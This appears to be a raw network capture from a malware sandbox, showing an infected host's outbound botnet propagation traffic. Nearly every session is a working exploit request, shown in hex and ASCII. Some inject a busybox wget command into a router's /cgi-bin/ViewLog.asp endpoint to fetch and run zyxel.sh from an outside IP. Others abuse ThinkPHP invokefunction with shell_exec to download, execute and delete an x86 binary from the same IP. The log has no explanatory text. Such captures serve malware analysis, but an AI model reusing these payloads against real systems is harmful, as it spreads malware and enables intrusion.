                                                        Feb 14, 2024 09:35:00.885199070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.145614094.121.25.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.885241032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.143528031.200.31.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.885278940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.144890488.255.236.7580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.037436008 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:01.291049957 CET496INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:01 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 302
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 31 37 2e 30 2e 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 172.17.0.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.144411688.103.218.11680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.248481035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:02.340255022 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:03.620166063 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:06.340074062 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:11.459841013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:21.703419924 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:42.690630913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.144696294.46.177.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.312341928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.520665884 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:00 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.146048085.215.184.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.325623035 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.551433086 CET587INHTTP/1.1 404 Not Found
                                                        Cache-Control: must-revalidate,no-cache,no-store
                                                        Content-Type: text/html;charset=iso-8859-1
                                                        Content-Length: 382
                                                        Connection: close
                                                        Server: Jetty(9.4.45.v20220203)
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.144037494.120.33.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.386904955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.144883262.36.23.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.562906981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.830756903 CET306INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:39:16 GMT
                                                        Server: PrHTTPD Ver1.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        x-content-type-options: nosniff
                                                        Connection: Close
                                                        Content-Length: 85
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.1435882112.171.134.13380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:01.739362955 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:02.019512892 CET517INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 412
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 3c 70 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 70 3e 3c 2f 68 31 3e 0a 20 20 20 20 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 26 23 78 32 37 3b 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 3a 20 26 71 75 6f 74 3b 68 69 6e 6b 5c 78 30 37 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 78 32 37 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 26 23 78 32 37 3b 20 48 54 54 50 2f 31 2e 31 26 71 75 6f 74 3b 26 23 78 32 37 3b 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1><p>Bad Request</p></h1> Invalid HTTP Version &#x27;Invalid HTTP Version: &quot;hink\x07pp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]=&#x27;wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp&#x27; HTTP/1.1&quot;&#x27; </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.144605295.216.166.22780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.243658066 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:03.463536024 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.1
                                                        Date: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.145597295.86.106.23980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.276818991 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.145959294.131.57.768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.281991959 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.470223904 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/4.10
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3543
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from localhost
                                                        X-Cache-Lookup: NONE from localhost:8080
                                                        Via: 1.1 localhost (squid/4.10)
                                                        Connection: close
